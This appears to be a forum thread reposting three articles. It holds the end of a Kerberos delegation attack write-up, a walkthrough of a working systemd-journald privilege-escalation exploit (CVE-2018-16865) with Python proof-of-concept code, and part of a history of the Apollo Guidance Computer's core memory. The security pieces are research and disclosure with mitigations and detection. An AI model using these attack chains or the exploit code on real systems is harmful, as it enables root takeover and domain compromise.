primitive would require one of the following: A client that does not negotiate signing, such as the web client on all Windows versions, including WebDAV clients. A client that does not support MIC in NTLM messages, such as Windows XP/2003 and prior. An LDAP service that does not ignore unsigned messages or does not verify the MIC on a domain controller that supports resource-based constrained delegation. I don’t believe that this unicorn exists. There are different primitives for triggering the computer account to authenticate over HTTP. Some of them were abused in Hot Potato. I chose to explore those that take an arbitrary UNC path and then trigger a WebDAV client connection. Note that on Windows servers, the WebDAV client is not installed by default. On Windows Server 2012R2 and prior, the Desktop Experience feature is required, and on Windows Server 2016 or later, the WebDAV Redirector feature is required. However, on desktops, the WebDAV client is installed by default. As I mentioned above, it seems that some researchers no longer care for such primitives. However, as Lee Christensen (@tifkin_) demonstrated with the combination of “the printer bug” and unconstrained delegation, and as I will demonstrate below, these primitives are still exploitable, and I encourage everyone to keep hunting for them (and tell me all about it when you find them). Getting Intranet-Zoned By default, the web client will only authenticate automatically to hosts in the intranet zone, which means that no dots can be present in the hostname. If the relay server already has a suitable DNS record, then this is not an issue. However, if the relay server is “rogue”, an IP address will not cut it. To overcome that, ADIDNS can be abused to add a new DNS record for the relay server, as Kevin Robertson (@NetSPI) explained in his blog post Exploiting Active Directory-Integrated DNS. Case Study 1: MSSQL RCE/LPE MSSQL has an undocumented stored procedure called xp_dirtree that lists the file and folders of a provided path. By default, this stored procedure is accessible to all authenticated users (“Public”). Under the following conditions, an attacker can achieve RCE/LPE (depending mainly on connectivity) by abusing the xp_dirtree stored procedure: The the attacker has compromised a user permitted to invoke the xp_dirtree stored procedure. The MSSQL service is running as Network Service, Local System, or a Virtual Account (default). The WebDAV client is installed and running on the target host. The abuse case would work as follows: The attacker compromises credentials or a TGT for an account that has an SPN or creates one (“Service A”), and an account premitted to connect and invoke xp_dirtree on the target MSSQL instance. If required, the attacker uses Service A to add a DNS record using ADIDNS. The attacker logs in to the MSSQL service on the target host (“Service B”) and invokes xp_dirtree to trigger a connection to a rogue WebDAV NTLM relay server. The attacker relays the computer account NTLM authentication to the LDAP service on the domain controller, and configures resource-based constrained delegation from Service A to Service B. The attacker uses Rubeus to perform a full S4U attack to obtain a TGS to Service B for a user that has local administrator privileges on the target host. The attacker can pass-the-ticket to compromise the target host. The following diagram illustrates this scenario: Video demonstration of this scenario: https://youtu.be/nL2oa3URkCs Matt Bush (@3xocyte) implemented “Bad Sequel” as a PoC exploit for this scenario. Case Study 2: Windows 10/2016/2019 LPE One late night, Matt Bush (@3xocyte), Danyal Drew (@danyaldrew) and I brainstormed ideas where to find suitable RCE/LPE primitives, and decided to explore what happens when a user changes the account picture in Windows 10/2016/2019. We analysed it with Process Monitor and quickly found that during the account picture change SYSTEM opens the picture file to read its attributes. It is a small and meaningless operation; not an arbitrary file write/read/delete. But we are humble people, and that is all we wanted. The abuse case would work as follows: The attacker compromises credentials or a TGT for an account that has an SPN or creates one (“Service A”). The attacker gains unprivileged access to another computer running Windows 10 or Windows Server 2016/2019 with the WebDAV Redirector feature installed (“Service B”). If required, the attacker uses Service A to add a DNS record using ADIDNS. The attacker changes the account profile picture to a path on a rogue WebDAV NTLM relay server. The attacker relays the computer account NTLM authentication to the LDAP service on the domain controller, and configures resource-based constrained delegation from Service A to Service B. The attacker uses Rubeus to perform a full S4U attack to obtain a TGS to Service B for a user that has local administrator privileges on it. The attacker can pass-the-ticket to compromise Service B. The following diagram illustrates this scenario: Video demonstration of this scenario: https://youtu.be/741uz0ILxCA Mitigating Factors Accounts marked as sensitive for delegation or members of the Protected Users group are not affected by the attacks presented here, except for the S4U2Self abuse. However, computer accounts are affected, and in my experience they are never marked as sensitive for delegation or added to the Protected Users group. I did not thoroughly test the effects of setting computer accounts as sensitive for delegation or adding them to the Protected Users group, so I cannot recommend doing that, but I do recommend exploring it. As Lee Christensen (@tifkin_) demonstrated in “the printer bug” abuse case study at DerbyCon 8, obtaining a TGT/TGS for a domain controller allows performing “dcsync” and compromising the domain. As demonstrated above, with resource-based constrained delegation, obtaining a TGT for any computer account allows impersonating users to it and potentially compromising the host. Therefore, it is important not to configure any host for unconstrained delegation, because it can facilitate the compromise of other hosts within the forest and within other forests with bidirectional trust. LDAP signing with channel binding can mitigate the RCE and LPE attack chains described in the case studies above. The RCE/LPE attack chains that involve NTLM relay to LDAP abuse a default ACE that permits Self to write msDS-AllowedToActOnBehalfOfOtherIdentity. Adding a new ACE that denies Self from writing to the attribute msDS-AllowedToActOnBehalfOfOtherIdentity will interrupt these attack chains, which will then have to fall back to abusing that primitive in conjunction with unconstrained delegation. If your organisation does not use resource-based constrained delegation, you can consider adding an ACE that blocks Everyone from writing to the attribute msDS-AllowedToActOnBehalfOfOtherIdentity. Detection The following events can be used in the implementation of detection logic for the attacks describes in this post: S4U2Self: S4U2Self can be detected in a Kerberos service ticket request event (Event ID 4769), where the Account Information and Service Information sections point to the same account. S4U2Proxy: S4U2Proxy can be detected in a Kerberos service ticket request event (Event ID 4769), where the Transited Services attribute in the Additional Information is not blank. Unconstrained Domain Persistence: The domain persistence technique described above can be detected in a in a Kerberos service ticket request event (Event ID 4769), where the Transited Services attribute in the Additional Information is not blank (indicating S4U2Proxy), and the Service Information points to the “krbtgt” account. msDS-AllowedToActOnBehalfOfOtherIdentity: If an appropriate SACL is defined, then resource-based constrained delegation configuration changes can be detected in directory service object modification events (Event ID 5136), where the LDAP Display Name is “msDS-AllowedToActOnBehalfOfOtherIdentity”. Events where the subject identity and the object identity are the same may be an indicator for some of the attacks presented above. A Word of Advice from Microsoft Microsoft did highlight the risk of S4U2Proxy in section 5.1 of MS-SFU: “The S4U2proxy extension allows a service to obtain a service ticket to a second service on behalf of a user. When combined with S4U2self, this allows the first service to impersonate any user principal while accessing the second service. This gives any service allowed access to the S4U2proxy extension a degree of power similar to that of the KDC itself. This implies that each of the services allowed to invoke this extension have to be protected nearly as strongly as the KDC and the services are limited to those that the implementer knows to have correct behavior.” S4U2Proxy is a dangerous extension that should be restricted as much as possible. However, the introduction of resource-based constrained delegation allows any account to permit arbitrary accounts to invoke S4U2Proxy, by configuring “incoming” delegation to itself. So should we protect all accounts as strongly as the KDC? Author Elad Shamir (@elad_shamir) from The Missing Link Security. Acknowledgements Will Schroeder (@harmj0y), Lee Christensen (@tifkin_), Matt Bush (@3xocyte), and Danyal Drew (@danyaldrew) for bouncing off ideas and helping me figure this out. Will Schroeder (@harmj0y) for Rubeus. Matt Bush (@3xocyte) for dementor.py, helping implement the WebDAV NTLM relay server, and implementing Bad Sequel. Lee Christensen (@tifkin_) for discovering “the printer bug” and implementing SpoolSample. Benjamin Delpy (@gentilkiwi) for modifying Kekeo and Mimikatz to support this research. And OJ Reeves (@TheColonial) for the introduction. Kevin Robertson (@NetSPI) for Powermad. Microsoft for always coming up with great ideas, and never disappointing. Disclosure Timeline 26/10/2018 - Sent initial report to MSRC. 27/10/2018 - MSRC Case 48231 was opened and a case manager was assigned. 01/11/2018 - Sent an email to MSRC to let them know this behaviour actually conforms with the specification, but I believe it is still a security issue. 09/11/2018 - Sent an email to MSRC requesting an update on this case. 14/11/2018 - MSRC responded that they are still trying to replicate the issue. 27/11/2018 - Sent an email to MSRC providing a 60-day notice to public disclosure. 09/12/2018 - Send a reminder email to MSRC. 11/12/2018 - MSRC responded that a new case manager was assigned and the following conclusion was reached: “The engineering team has determined this is not an issue which will be addressed via a security update but rather we need to update our documentation to highlight service configuration best practices and using a number of features such as group managed service accounts, resource based constrained delegation, dynamic access control, authentication policies, and ensuring unconstrained delegation is not enabled. The team is actively working on the documentation right now with the goal of having it published prior to your disclosure date.” 28/01/2019 - Public disclosure I would like to note that my first experience with MSRC was very disappointing. The lack of dialogue was discouraging and not at all what I had expected. This post was also published on eladshamir.com. Sursa: https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html
  3. Exploiting systemd-journald Part 1 January 29, 2019 By Nick Gregory Introduction This is part one in a multipart series on exploiting two vulnerabilities in systemd-journald, which were published by Qualys on January 9th. Specifically, the vulnerabilities were: a user-influenced size passed to alloca(), allowing manipulation of the stack pointer (CVE-2018-16865) a heap-based memory out-of-bounds read, yielding memory disclosure (CVE-2018-16866) The affected program, systemd-journald, is a system service that collects and stores logging data. The vulnerabilities discovered in this service allow for user-generated log data to manipulate memory such that they can take over systemd-journald, which runs as root. Exploitation of these vulnerabilities thus allow for privilege escalation to root on the target system. As Qualys did not provide exploit code, we developed a proof-of-concept exploit for our own testing and verification. There are some interesting aspects that were not covered by Qualys’ initial publication, such as how to communicate with the affected service to reach the vulnerable component, and how to control the computed hash value that is actually used to corrupt memory. We thought it was worth sharing the technical details for the community. As the first in our series on this topic, the objective of this post is to provide the reader with the ability to write a proof-of-concept capable of exploiting the service with Address Space Layout Randomization (ASLR) disabled. In the interest of not posting an unreadably-long blog, and also not handing sharp objects to script-kiddies before the community has had chance to patch, we are saving some elements for discussion in future posts in this series, including details on how to control the key computed hash value. We are also considering providing a full ASLR bypass, but are weighing whether we are lowering the bar too much for the kiddies (feel free to weigh in with opinions). As the focus of this post is on exploitation, the content is presented assuming the reader is already familiar with the initial publication’s analysis of the basic nature and mechanisms of the vulnerabilities involved. The target platform and architecture which we assume for this post is Ubuntu x86_64, and so to play along at home, we recommend using the 20180808.0.0 release of the ubuntu/bionic64 Vagrant image. Proof-of-Concept Attack Vector Before we can start exploiting a service, we need to understand how to communicate with it. In the case of journald, we could use the project’s own C library (excellently explained here). To ease exploitation, we need to have full control over the data sent to the target, a capability which unfortunately the journald libraries don’t provide out of the box. Thus, we chose to write our exploit in Python, implementing all the required functionality from scratch. To dive deeper into how our exploit works, we need to first understand how journald clients communicate to the daemon. So let’s get started! Interacting with systemd-journald There are three main ways userland applications can interact with journald: the syslog interface, the journald-native interface, and journald’s service stdout/stdin redirection. All of these interfaces have dedicated UNIX sockets in /run/systemd/journald/. For our purposes, we only need to investigate the syslog and native interfaces, as those attempt to parse the log messages sent by programs, and are where the vulnerabilities reside. Syslog Interface The syslog interface is the simplest interface to journald, being a compatibility layer for applications that aren’t built with journald-specific logging. This interface is available by writing to one of the standard syslog UNIX datagram sockets such as /dev/log or /run/systemd/journal/dev-log. Any syslog messages written into them are parsed by journald (to remove the standard date, hostname, etc. added by syslog, see manpage syslog(3)) and then saved. A simple way to experiment with the parser is by sending data with netcat, and observing the output with journalctl: $ echo 'Test Message!' | nc -Uu /dev/log $ journalctl --user -n 1 ... Jan 23 17:23:47 localhost nc[3646]: Test Message! Journald-Native Interface The native interface is how journal-aware applications log to the journal. Similar to the syslog interface, this is accessed by the UNIX datagram socket at /run/systemd/journal/socket.The journald-native interface uses a simple protocol for clients to talk to the journald server over this socket, resembling a simple Key/Value store, and which allows clients to send multiple newline-separated entries in a single write. These entries can either be simple KEY=VALUE pairs or binary blobs. Binary blobs are formed by sending the entry field name, a newline, the size of the blob as a uint64, the contents of the blob, and a final newline like so: SOME_KEY \x0a\x00\x00\x00\x00\x00\x00\x00\x00SOME_VALUE The native socket can also accept these entries in two different ways: by directly sending data over the socket by using an interesting feature of UNIX sockets, which is the ability to send a file descriptor (FD) over the socket Datagram sockets can only handle messages of a limited size (around 0x34000 bytes in our environment) before erroring with EMSGSIZE, and this is where FD passing comes in to play. We can write our messages to a temporary file, then pass journald a file descriptor for that file, giving us the ability to send messages up to journald’s self-imposed 768MB limit (defined by DATA_SIZE_MAX). Digging into FD passing a bit further, we find that journald can accept two different types of file descriptors: normal file descriptors (see manpages fcntl(2)) sealed memfds (see manpages memfd_create(2)) Luckily, we don’t need to bother with sealed file descriptors for reasons that we’ll get to in a future post. Similarly to the syscall interface, you can easily send native messages with nc: $ echo 'MESSAGE=Hello!' | nc -Uu /run/systemd/journal/socket $ journalctl --user -n 1 ... Jan 23 17:39:40 localhost nc[7154]: Hello! And to add custom entries: $ echo 'KEY=VALUE\nMESSAGE=Hello!' | nc -Uu /run/systemd/journal/socket $ journalctl --user -n 1 -o json-pretty { "__CURSOR" : "s=e07cdf6930884834bec282476c7b59e0;i=4e652;b=9a1272556aa440f69531842f94d8f10a;m=163757c8c8 "__REALTIME_TIMESTAMP" : "1548283220714394", "__MONOTONIC_TIMESTAMP" : "95417780424", ... "MESSAGE" : "Hello!", "KEY" : "VALUE", ... } Exploitation Overview Now that we have a decent understanding of how to interact with journald, we can start writing our exploit. Since the goal of this first post is to write a PoC which works with ASLR disabled, we don’t have to worry about using the syslog interface to perform a memory disclosure, and will instead jump directly into the fun of exploiting journald with CVE-2018-16865. As noted by Qualys, the user-influenced size allocated with alloca() is exploitable due to the ability to create a message with thousands, or even millions of entries. When these entries are appended to the journal, these messages result in a size of roughly sizeof(EntryItem) * n_entries to be allocated via alloca(). Since the mechanism of alloca() to reserve memory on the stack is a simple subtraction from the stack pointer with a sub rsp instruction, our influence over this size value grants the ability to lower the stack pointer off the bottom of the stack into libc. The actual use of alloca() in the source is wrapped in a macro called newa(), and the responsible code for the vulnerable operation looks like: items = newa(EntryItem, MAX(1u, n_iovec)); Our general approach for exploiting this vulnerability is to initially send the right size and count of entries, so as to make the stack pointer point to libc’s BSS memory region , and then surgically overwrite the free_hook function pointer with a pointer to system. This grants us arbitrary command execution upon the freeing of memory with content we control. To actually exploit this, there are two main issues we need to solve: Sending all of the entries to journald Controlling the data written to the stack after it has been lowered into libc The first issue has already been addressed by our exploration of the native interface, as discussed in the previous section. From this interface we can write data to a temporary file, and then pass the FD for that file to journald which gives us easily enough room to send the hundreds of megabytes of data needed to jump from the stack to libc. The second issue is a bit more complex, since we don’t directly control the data written to the stack after it has been lowered into libc’s memory. This is because our entries are being hashed prior to being written, by the function jenkins_hashlittle2 (originally written by Bob Jenkins, hence the name). Thus, exploitation requires controlling all 64 bits of output that the hash function produces, which presents a seemingly formidable problem at first. Preimaging a hash can be a daunting task; however, there are some very nice tools we can use to calculate exact preimages in under 30 seconds, since this is not a cryptographically secure hash. We’ll be exploring the specifics of achieving this calculation and the tools involved in our next blog post. For the scope of this post and our initial PoC, we will be using the constants we have already computed for our Vagrant image. Proof-of-Concept Code Here we will begin walking through Python code for our PoC, and a link to the full script can be found at the very end. The first chunk of code is basic setup, helper functions, and a nice wrapper around UNIX sockets that will make our life easier further down the line: #!/usr/bin/env python3 import array import os import socket import struct TEMPFILE = '/tmp/systemdown_temp' def p64(n): return struct.pack('<Q', n) class UNIXSocket(object): def __init__(self, path): self.path = path def __enter__(self): self.client = socket.socket(socket.AF_UNIX, socket.SOCK_DGRAM, 0) self.client.connect(self.path) return self.client def __exit__(self, exc_t, exc_v, traceback): self.client.close() Next we have some constants that may change based on the particular target environment. These constants were built for the 20180808.0.0 release of the ubuntu/bionic64 Vagrant image (and again, these assume a target with ASLR disabled): # Non-ASLR fixed locations for our test image libc = 0x7ffff79e4000 stack = 0x7fffffffde60 #location of the free_hook function pointer to overwrite free_hook = libc + 0x3ed8e8 # preimage which computes to location of the system function via hash64() # that location is libc + 0x4f440 in our test image system_preimage = b"Y=J~-Y',Wj(A" # padding count to align memory padding_kvs = 3 Now we have the bulk of the values needed for our proof-of-concept exploit. The first step in the exploit logic is to add some padding entries which causes an increase in the size of the alloca, shifting the stacks of journal_file_append_data (and the functions it calls) further down. This is to align the precise location where data will be written in libc’s .BSS, and avoid unnecessarily clobbering any other libc global values, which could greatly interfere with exploitation. with open(TEMPFILE, 'wb') as log: msg = b"" for _ in range(padding_kvs): msg += b"P=\n" Next, we add the preimage value, the hash for which (when computed from hash64()) will be the address of system. Specifically, this alignment of this value will be such that journald writes system into libc’s __free_hook, giving us a shell when our command below is freed. # msg n is our key that when hashed gives system msg += system_preimage + b"\n" Next, we append our command as a binary data block surrounded by semicolons to make sh happy. We also ensure journald is forcefully killed here so that libc has no chance of locking up after the system() call returns: # next is our command as a binary data block cmd = b"echo $(whoami) > /tmp/pwn" # be sure to kill journald afterwards so it doesn't lockup cmd = b";" + cmd + b";killall -9 /lib/systemd/systemd-journald;" # format as a binary data block msg += b"C\n" msg += p64(len(cmd)) msg += cmd + b"\n" As described by Qualys, we then send a large entry (>=128MB), which results in an error and causes journald to break out of the loop that is processing the entries (src). Once this error condition is hit and the loop is stopped, no more values are written, and so this step is important to discontinue the corrupting of memory, preventing values from being written to unmapped / non-writable memory between libc and the stack. # Then we send a large item which breaks the loop msg += b"A=" + b"B"*(128*1024*1024) + b"\n" Finally, we pad our message with enough entries to cause the stack->libc drop to happen in the first place: # Then fill with as many KVs as we need to get to the right addr num_msgs = (((stack - free_hook)//16) - 1) num_msgs -= 3 # the three above num_msgs -= 7 # added by journald itself msg += b"B=\n" * num_msgs log.write(msg) At this point, we just need to pass the log FD to journald to get our shell: with UNIXSocket("/run/systemd/journal/socket") as sock: with open(TEMPFILE, 'rb') as log: sock.sendmsg([b""], [(socket.SOL_SOCKET, socket.SCM_RIGHTS, array.array("i", [log.fileno()]))]) os.unlink(TEMPFILE) After running this, we find the file /tmp/pwn has been created with contents “root”, meaning we have successfully achieved our privilege escalation. $ cat /tmp/pwn root All Together Now The full proof-of-concept script that works with ASLR disabled is available here. Detection Having a working exploit for this (and other interesting) CVEs helps us validate our zero-day detection capabilities, and when necessary, improve them. Here, even with ASLR turned off, we detect exploitation out-of-the-box, as it is happening, through our Stack Pivot Strategy (we call our detection models strategies), and would generally detect most payloads. With ASLR turned on, an additional strategy detects the attempt to bypass ASLR. We do this all by looking for clear evidence of exploitation, instead of attempting to do signature scanning for IOCs associated with any specific CVE, malware family, threat actor, etc. While we can support that too, whack-a-mole isn’t a good model for detection and prevention. Sursa: https://capsule8.com/blog/exploiting-systemd-journald-part-1/
  4. Inside the Apollo Guidance Computer's core memory The Apollo Guidance Computer (AGC) provided guidance, navigation and control onboard the Apollo flights to the Moon. This historic computer was one of the first to use integrated circuits, containing just two types of ICs: a 3-input NOR gate for the logic circuitry and a sense amplifier IC for the memory. It also used numerous analog circuits built from discrete components using unusual cordwood construction. The Apollo Guidance Computer. The empty space on the left held the core rope modules. The connectors on the right communicate between the AGC and the spacecraft. We1 are restoring the AGC shown above. It is a compact metal box with a volume of 1 cubic foot and weighs about 70 pounds. The AGC had very little memory by modern standards: 2048 words of RAM in erasable core memory and 36,864 words of ROM in core rope memory. (In this blog post, I'll discuss just the erasable core memory.) The core rope ROM modules (which we don't have)2 would be installed in the empty space on the left. On the right of the AGC, you can see the two connectors that connected the AGC to other parts of the spacecraft, including the DSKY (Display/Keyboard).3 By removing the bolts holding the two trays together, we could disassemble the AGC. Pulling the two halves apart takes a surprising amount of force because of the three connectors in the middle that join the two trays. The tray on the left is the "A" tray, which holds the logic and interface modules. The tangles of wire on the left of the tray are the switching power supplies that convert 28 volts from the spacecraft to 4 and 14 volts for use in the AGC. The tray on the right is the "B" tray, which holds the memory circuitry, oscillator and alarm. The core memory module was removed in this picture; it goes in the empty slot in the middle of the B tray. The AGC is implemented with dozens of modules in two trays. The trays are connected through the three connectors in the middle. Core memory overview Core memory was the dominant form of computer storage from the 1950s until it was replaced by semiconductor memory chips in the early 1970s. Core memory was built from tiny ferrite rings called cores, storing one bit in each core. Cores were arranged in a grid or plane, as in the highly-magnified picture below. Each plane stored one bit of a word, so a 16-bit computer would use a stack of 16 core planes. Each core typically had 4 wires passing through it: X and Y wires in a grid to select the core, a diagonal sense line through all the cores for reading, and a horizontal inhibit line for writing.4 Closeup of a core memory (not AGC). Photo by Jud McCranie (CC BY-SA 4.0). Each core stored a bit by being magnetized either clockwise or counterclockwise. A current in a wire through the core could magnetize the core with the magnetization direction matching the current's direction. To read the value of a core, the core was flipped to the 0 state. If the core was in 1 state previously, the changing magnetic field produced a voltage in the sense wire threaded through the cores. But if the core was in the 0 state to start, the sense line wouldn't pick up a voltage. Thus, forcing a core to 0 revealed the core's previous state (but erased it in the process). A key property of the cores was hysteresis: a small current had no effect on a core; the current had to be above a threshold to flip the core. This was very important because it allowed a grid of X and Y lines to select one core from the grid. By energizing one X line and one Y line each with half the necessary current, only the core where both lines crossed would get enough current to flip and other cores would be unaffected. This "coincident-current" technique made core memory practical since a few X and Y drivers could control a large core plane. The AGC's erasable core memory system The AGC used multiple modules in the B tray to implement core memory. The Erasable Memory module (B12) contained the actual cores, 32768 cores to support 2048 words; each word was 15 bits plus a parity bit. Several more modules contained the supporting circuitry for the memory.5 The remainder of this article will describe these modules. The erasable memory module in the Apollo Guidance Computer, with the supporting modules next to it. Image courtesy of Mike Stewart. The photo below shows the Erasable Memory module after removing it from the tray. Unlike the other modules, this module has a black metal cover. Internally, the cores are encapsulated in Silastic (silicone rubber), which is then encapsulated in epoxy. This was intended to protect the delicate cores inside, but it took NASA a couple tries to get the encapsulation right. Early modules (including ours) were susceptible to wire breakages from vibrations. At the bottom of the modules are the gold-plated pins that plug into the backplane. The erasable core memory module from the Apollo Guidance Computer. Core memory used planes of cores, one plane for each bit in the word. The AGC had 16 planes (which were called mats), each holding 2048 bits in a 64×32 grid. Note that each mat consists of eight 16×16 squares. The diagram below shows the wiring of the single sense line through a mat. The X/Y lines were wired horizontally and vertically. The inhibit line passed through all the cores in the mat; unlike the diagonal sense line it ran vertically. The sense line wiring in an AGC core plane (mat). The 2048 cores are in a 64×32 grid. Most computers physically stacked the core planes on top of each other but the AGC used a different mechanical structure, folding the mats (planes) to fit compactly in the module. The mats were accordion-folded to fit tightly into the module as shown in the diagram below. (Each of the 16 mats is outlined in cyan.) When folded, the mats formed a block (oriented vertically in the diagram below) that was mounted horizontally in the core module. This folding diagram shows how 16 mats are folded into the core module. (Each cyan rectangle indicates a mat.) The photo below shows the memory module with the cover removed. (This is a module on display at the CHM, not our module.) Most of the module is potted with epoxy, so the cores are not visible. The most noticeable feature is the L-shaped wires on top. These connect the X and Y pins to 192 diodes. (The purpose of the diode will be explained later.) The diodes are hidden underneath this wiring in two layers, mounted horizontally cordwood-style. The leads from the diodes are visible as they emerge and connect to terminals on top of the black epoxy. The AGC's memory module with the cover removed. This module is on display at the CHM. Photo courtesy of Mike Stewart. Marc took X-rays of the module and I stitched the photos together (below) to form an image looking down into the module. The four rows of core mats in the folding diagram correspond to the four dark blocks. You can also see the two rows of diodes as two darker horizontal stripes. At this resolution, the wires through the cores and the tangled mess of wires to the pins are not visible; these wires are very thin 38-gauge wires, much thinner than the wires to the diodes. Composite X-ray image of the core memory module. The stitching isn't perfect in the image because the parallax and perspective changed in each image. In particular, the pins appear skewed in different directions. The diagram below shows a cross-section of the memory module. (The front of the module above corresponds to the right side of the diagram.) The diagram shows how the two layers of diodes (blue) are arranged at the top, and are wired (red) to the core stack (green) through the "feed thru". Also note how the pins (yellow) at the bottom of the module rise up through the epoxy and are connected by wires (red) to the core stack. Cross-section of memory module showing internal wiring. From Apollo Computer Design Review page 9-39 (Original block II design.) Addressing a memory location The AGC's core memory holds 2048 words in a 64×32 matrix. To select a word, one of the 64 X select lines is energized along with one of the 32 Y select lines. One of the challenges of a core memory system is driving the X and Y select lines. These lines need to be driven at high current (100's of milliamps). In addition, the read and write currents are opposite directions, so the lines need bidirectional drivers. Finally, the number of X and Y lines is fairly large (64 + 32 for the AGC), so using a complex driver circuit on each line would be too bulky and expensive. In this section, I'll describe the circuitry in the AGC that energizes the right select lines for a particular address. The AGC uses a clever trick to minimize the hardware required to drive the X and Y select lines. Instead of using 64 X line drivers, the AGC has 8 X drivers at the top of the matrix, and 8 at the bottom of the matrix. Each of the 64 select lines is connected to a different top and bottom driver pair. Thus, energizing a top driver and a bottom driver produces current through a single X select line. Thus, only 8+8 X drivers are required rather than 64.6 The Y drivers are similar, using 4 on one side and 8 on the other. The downside of this approach is 192 diodes are required to prevent "sneak paths" through multiple select lines.7 Illustration of how "top" and "bottom" drivers work together to select a single line through the core matrix. Original diagram here. The diagram above demonstrates this technique for the vertical lines in a hypothetical 9×5 core array. There are three "top" drivers (A, B and C), and three "bottom" drivers (1, 2 and 3). If driver B is energized positive and driver 1 is energized negative, current flows through the core line highlighted in red. Reversing the polarity of the drivers reverses the current flow, and energizing different drivers selects a different line. To see the need for diodes, note that in the diagram above, current could flow from B to 2, up to A and finally down to 1, for instance, incorrectly energizing multiple lines. The address decoder logic is in tray "A" of the AGC, implemented in several logic modules.9 The AGC's logic is entirely built from 3-input NOR gates (two per integrated circuit), and the address decoder is no exception. The image below shows logic module A14. (The other logic modules look essentially the same, but the internal printed circuit board is wired differently.) The logic modules all have a similar design: two rows of 30 ICs on each side, for 120 ICs in total, or 240 3-input NOR gates. (Module A14 has one blank location on each side, for 118 ICs in total.) The logic module plugs into the AGC via the four rows of pins at the bottom.10 Much of the address decoding is implemented in logic module A14. Photo courtesy of Mike Stewart. The diagram below shows the circuit to generate one of the select signals (XB6—X bottom 6).11 The NOR gate outputs a 1 if the inputs are 110 (i.e. 6). The other select signals are generated with similar circuits, using different address bits as inputs. This address decode circuit generates one of the select signals. The AGC has 28 decode circuits similar to this. Each integrated circuit implemented two NOR gates using RTL (resistor-transistor logic), an early logic family. These ICs were costly; they cost $20-$30 each (around $150 in current dollars). There wasn't much inside each IC, just three transistors and eight resistors. Even so, the ICs provided a density improvement over the planned core-transistor logic, making the AGC possible. The decision to use ICs in the AGC was made in 1962, amazingly just four years after the IC was invented. The AGC was the largest consumer of ICs from 1962 to 1965 and ended up being a major driver of the integrated circuit industry. Each IC contains two NOR gates implemented with resistor-transistor logic. From Schematic 2005011. The die photo below shows the internal structure of the NOR gate; the metal layer of the silicon chip is most visible.12 The top half is one NOR gate and the bottom half is the other. The metal wires connect the die to the 10-pin package. The transistors are clumped together in the middle of the chip, surrounded by the resistors. Die photo of the dual 3-input NOR gate used in the AGC. Pins are numbered counterclockwise; pin 3 is to the right of the "P". Photo by Lisa Young, Smithsonian. Erasable Driver Modules Next, the Erasable Driver module converts the 4-volt logic-level signals from the address decoder into 14-volt pulses with controlled current. The AGC has two identical Erasable Driver modules, in slots B9 and B10.5 Two modules are required due to the large number of signals: 28 select lines (X and Y, top and bottom), 16 inhibit lines (one for each bit), and a dozen control signals. The select line driver circuits are simple transistor switching circuits: a transistor and two resistors. Other circuits, such as the inhibit line drivers are a bit more complex because the shape and current of the pulse need to be carefully matched to the core module. This circuit uses three transistors, an inductor, and a handful of resistors and diodes. The resistor values are carefully selected during manufacturing to provide the desired current. The erasable driver module, front and back. Photo courtesy of Mike Stewart. This module, like the other non-logic modules, is built using cordwood construction. In this high-density construction, components were inserted into holes in the module, passing through from one side of the module to the other, with their leads exiting on either side. (Except for transistors, with all three leads on the same side.) On each side of the module, point-to-point wiring connected the components with welded connections. In the photo below, note the transistors (golden, labeled with Q), resistors (R), diodes (CR for crystal rectifier, with K indicating the cathode), large capacitors (C), inductor (L), and feed-throughs (FT). A plastic sheet over the components conveniently labels them; for instance, "7Q1" means transistor Q1 for circuit 7 (of a repeated circuit). These labels match the designations on the schematic. At the bottom are connections to the module pins. Modules that were flown on spacecraft were potted with epoxy so the components were protected against vibration. Fortunately, our AGC was used on the ground and left mostly unpotted, so the components are visible. A closeup of the Erasable Driver module, showing the cordwood construction. Photo courtesy of Mike Stewart. Current Switch Module You might expect that the 14-volt pulses from the Erasable Driver modules would drive the X and Y lines in the core. However, the signals go through one more module, the Current Switch module, in slot B11 just above the core memory module. This module generates the bidirectional pulses necessary for the X and Y lines. The driver circuits are very interesting as each driver includes a switching core in the circuit. (These cores are much larger than the cores in the memory itself.)13 The driver uses two transistors: one for the read current, and the other for the write current in the opposite direction. The switching core acts kind of like an isolation transformer, providing the drive signal to the transistors. But the switching core also "remembers" which line is being used. During the read phase, the address decoder flips one of the cores. This generates a pulse that drives the transistor. During the write phase, the address decoder is not involved. Instead, a "reset" signal is sent through all the driver cores. Only the core that was flipped in the previous phase will flip back, generating a pulse that drives the other transistor. Thus, the driver core provides memory of which line is active, avoiding the need for a flip flop or other latch. The current switch module. (This is from the CHM as ours is encapsulated and there's nothing to see but black epoxy.) Photo courtesy of Mike Stewart. The diagram below shows the schematic of one of the current switches. The heart of the circuit is the switching core. If the driver input is 1, winding A will flip the the core when the set strobe is pulsed. This will produce a pulses on the other windings; the positive pulse on winding B will turn on transistor Q55, pulling the output X line low for reading.14 The output is connected via eight diodes to eight X top lines through the core. A similar bottom select switch (without diodes) will pull X bottom lines high; the single X line with the top low and the bottom high will be energized, selecting that row. For a write, the reset line is pulled low energizing winding D. If the core had flipped earlier, it will flip back, generating a pulse on winding C that will turn on transistor Q56, and pull the output high. But if the core had not flipped earlier, nothing happens and the output remains inactive. As before, one X line and one Y line through the core planes will be selected, but this time the current is in the opposite direction for a write. Schematic of one of the current switches in the AGC. This switch is the driver for X top line 0. The schematic shows one of the 8 pairs of diodes connected to this driver. The photo below shows one of the current switch circuits and its cordwood construction. The switching core is the 8-pin black module between the transistors. The core and the wires wound through it are encapsulated with epoxy, so there's not much to see. At the bottom of the photo, you can see the Malco Mini-Wasp pins that connect the module to the backplane. Closeup of one switch circuit in the Current Switch Module. The switching core (center) has transistors on either side. Sense Amplifier Modules When a core flips, the changing magnetic field induces a weak signal in the corresponding sense line. There are 16 sense lines, one for each bit in the word. The 16 sense amplifiers receive these signals, amplify them, and convert them to logic levels. The sense amplifiers are implemented using a special sense amplifier IC. (The AGC used only two different ICs, the sense amplifier and the NOR gate.) The AGC has two identical sense amplifier modules, in slots B13 and B14; module B13 is used by the erasable core memory, while B14 is used by the fixed memory (i.e. core rope used for ROM). The signal from the core first goes through an isolation transformer. It is then amplified by the IC and the output is gated by a strobe transistor. The sense amplifier depends on carefully-controlled voltage levels for bias and thresholds. These voltages are produced by voltage regulators on the sense amplifier modules that use Zener diodes for regulation. The voltage levels are tuned during manufacturing by selecting resistor values and optional diodes, matching each sense amplifier module to the characteristics of the computer's core memory module. The photo below shows one of the sense amp modules. The eight repeated units are eight sense amplifiers; the eight other sense amplifiers are on the other side of the module. The reddish circles are the pulse transformers, while the lower circles are the sense amplifier ICs. The voltage 